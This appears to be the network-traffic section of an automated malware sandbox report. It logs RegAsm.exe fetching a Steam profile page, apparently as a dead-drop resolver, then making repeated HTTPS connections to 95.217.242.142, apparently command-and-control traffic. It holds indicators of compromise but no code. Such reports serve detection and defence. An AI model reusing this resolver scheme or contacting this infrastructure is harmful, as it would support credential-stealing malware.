                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:30.529998064 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:30.530002117 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.274271965 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.274298906 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.274321079 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.274349928 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.274410009 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.274410009 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.274420977 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.274470091 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.380856037 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.380878925 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.380939960 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.380959034 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.381000996 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.534719944 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.534744024 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.534818888 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.534840107 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.534885883 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.644766092 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.644788980 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.644870043 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.644882917 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.644937038 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.712336063 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.712389946 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.712435007 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.712438107 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.712476969 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.712500095 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.713037968 CEST49770443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.713052034 CEST4434977095.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.942715883 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.942754984 CEST4434977195.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.942825079 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.943094015 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:31.943109035 CEST4434977195.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:32.399198055 CEST4434977195.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:32.401035070 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:32.401412010 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:32.401421070 CEST4434977195.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:32.401580095 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:32.401590109 CEST4434977195.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.247230053 CEST4434977195.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.247256041 CEST4434977195.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.247299910 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.247311115 CEST4434977195.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.247324944 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.247325897 CEST4434977195.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.247364998 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.247400999 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.247514963 CEST49771443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.247530937 CEST4434977195.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.250114918 CEST49772443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.250147104 CEST4434977295.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.250222921 CEST49772443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.250406027 CEST49772443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.250417948 CEST4434977295.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.703665018 CEST4434977295.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.703929901 CEST49772443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.704346895 CEST49772443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.704356909 CEST4434977295.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.704487085 CEST49772443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:33.704493046 CEST4434977295.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.556421041 CEST4434977295.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.556472063 CEST49772443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.556493998 CEST4434977295.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.556504011 CEST4434977295.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.556540966 CEST49772443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.556665897 CEST49772443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.556678057 CEST4434977295.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.575330973 CEST49773443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.575361967 CEST4434977395.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.575449944 CEST49773443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.575680017 CEST49773443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:34.575696945 CEST4434977395.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.048870087 CEST4434977395.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.048934937 CEST49773443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.049348116 CEST49773443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.049355030 CEST4434977395.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.049523115 CEST49773443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.049527884 CEST4434977395.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.911318064 CEST4434977395.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.911387920 CEST49773443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.911391020 CEST4434977395.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.911437988 CEST49773443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.912683964 CEST49773443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:35.912698030 CEST4434977395.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:36.636123896 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:36.636157036 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:36.636240959 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:36.636451006 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:36.636464119 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.110403061 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.110663891 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111129999 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111141920 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111243963 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111249924 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111340046 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111357927 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111447096 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111464024 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111474991 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111484051 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111733913 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.111758947 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.127976894 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:37.127994061 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:38.605398893 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:38.605494022 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:38.605565071 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:38.605593920 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.320427895 CEST49774443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.320465088 CEST4434977495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.325516939 CEST49775443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.325562000 CEST4434977595.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.325629950 CEST49775443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.325937986 CEST49775443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.325947046 CEST4434977595.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.798844099 CEST4434977595.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.798964024 CEST49775443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.808530092 CEST49775443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.808540106 CEST4434977595.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.812201977 CEST49775443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:39.812208891 CEST4434977595.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.688134909 CEST4434977595.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.688206911 CEST49775443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.688218117 CEST4434977595.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.688260078 CEST49775443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.688359976 CEST49775443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.688369989 CEST4434977595.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.689605951 CEST49776443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.689625978 CEST4434977695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.689712048 CEST49776443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.689899921 CEST49776443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:40.689904928 CEST4434977695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:41.160198927 CEST4434977695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:41.160455942 CEST49776443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:41.160656929 CEST49776443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:41.160661936 CEST4434977695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:41.160835981 CEST49776443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:41.160840988 CEST4434977695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:42.032390118 CEST4434977695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:42.032445908 CEST49776443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:42.032458067 CEST4434977695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:42.032495975 CEST49776443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:42.032515049 CEST4434977695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:42.032553911 CEST49776443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:42.032685041 CEST49776443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:42.032697916 CEST4434977695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:55.513659954 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:55.513695002 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:55.513763905 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:55.514672041 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:55.514698982 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.119952917 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.120039940 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.123750925 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.123756886 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.123954058 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.131911993 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.176105976 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.719264030 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.719291925 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.719325066 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.719397068 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.719412088 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.719472885 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.719474077 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:56.719516993 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:57.796817064 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:57.796848059 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:57.796888113 CEST49777443192.168.2.440.127.169.103
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:57.796895981 CEST4434977740.127.169.103192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.587177038 CEST49779443192.168.2.4142.250.191.196
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.587222099 CEST44349779142.250.191.196192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.587439060 CEST49779443192.168.2.4142.250.191.196
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.588129997 CEST49779443192.168.2.4142.250.191.196
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.588140965 CEST44349779142.250.191.196192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.832513094 CEST44349779142.250.191.196192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.835268021 CEST49779443192.168.2.4142.250.191.196
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.835284948 CEST44349779142.250.191.196192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.836365938 CEST44349779142.250.191.196192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.836425066 CEST49779443192.168.2.4142.250.191.196
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.837701082 CEST49779443192.168.2.4142.250.191.196
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.837758064 CEST44349779142.250.191.196192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.877810955 CEST49779443192.168.2.4142.250.191.196
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.877825975 CEST44349779142.250.191.196192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.924504042 CEST49779443192.168.2.4142.250.191.196
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:09.956321955 CEST4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:09.956418037 CEST4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:10.065715075 CEST8049723199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:10.065731049 CEST8049723199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:10.065742970 CEST8049724199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:10.065792084 CEST4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:10.065886021 CEST8049724199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:10.065936089 CEST4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:16.840642929 CEST44349779142.250.191.196192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:16.840701103 CEST44349779142.250.191.196192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:16.840759993 CEST49779443192.168.2.4142.250.191.196
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:18.321331978 CEST49779443192.168.2.4142.250.191.196
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:18.321357012 CEST44349779142.250.191.196192.168.2.4
                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.039299965 CEST6387153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.153511047 CEST53638711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:02.220340967 CEST53504201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:02.371845007 CEST6285353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:02.372335911 CEST6170153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:02.415172100 CEST53622521.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:02.482796907 CEST53617011.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:02.482851982 CEST53628531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:04.585088968 CEST53573831.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:14.087209940 CEST53505951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.527057886 CEST138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:25.795748949 CEST53559761.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:48.659003019 CEST53577751.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:01.963270903 CEST53553291.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.474561930 CEST6426453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.475032091 CEST4959153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.585498095 CEST53642641.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.585542917 CEST53495911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:18.433835983 CEST53596371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.039299965 CEST192.168.2.41.1.1.10xe728Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:02.371845007 CEST192.168.2.41.1.1.10xc3b3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:02.372335911 CEST192.168.2.41.1.1.10x4a1fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.474561930 CEST192.168.2.41.1.1.10xa8c3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.475032091 CEST192.168.2.41.1.1.10xe8eaStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Apr 29, 2024 22:12:57.153511047 CEST1.1.1.1192.168.2.40xe728No error (0)steamcommunity.com23.210.138.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:02.482796907 CEST1.1.1.1192.168.2.40x4a1fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:02.482851982 CEST1.1.1.1192.168.2.40xc3b3No error (0)www.google.com142.250.191.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.585498095 CEST1.1.1.1192.168.2.40xa8c3No error (0)www.google.com142.250.191.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Apr 29, 2024 22:14:06.585542917 CEST1.1.1.1192.168.2.40xe8eaNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                                                                            • 95.217.242.142
                                                                                                                                                                                                                                                            • www.google.com
                                                                                                                                                                                                                                                            • fs.microsoft.com
                                                                                                                                                                                                                                                            • slscr.update.microsoft.com
                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.44973023.210.138.1054437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:12:57 UTC119OUTGET /profiles/76561199680449169 HTTP/1.1
                                                                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:12:57 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:12:57 GMT
                                                                                                                                                                                                                                                            Content-Length: 33795
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: sessionid=c3d738fe937f6f41216b0482; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C1a3fb9ece96beaac5d6062fddfc395f9; Path=/; Secure; HttpOnly; SameSite=None
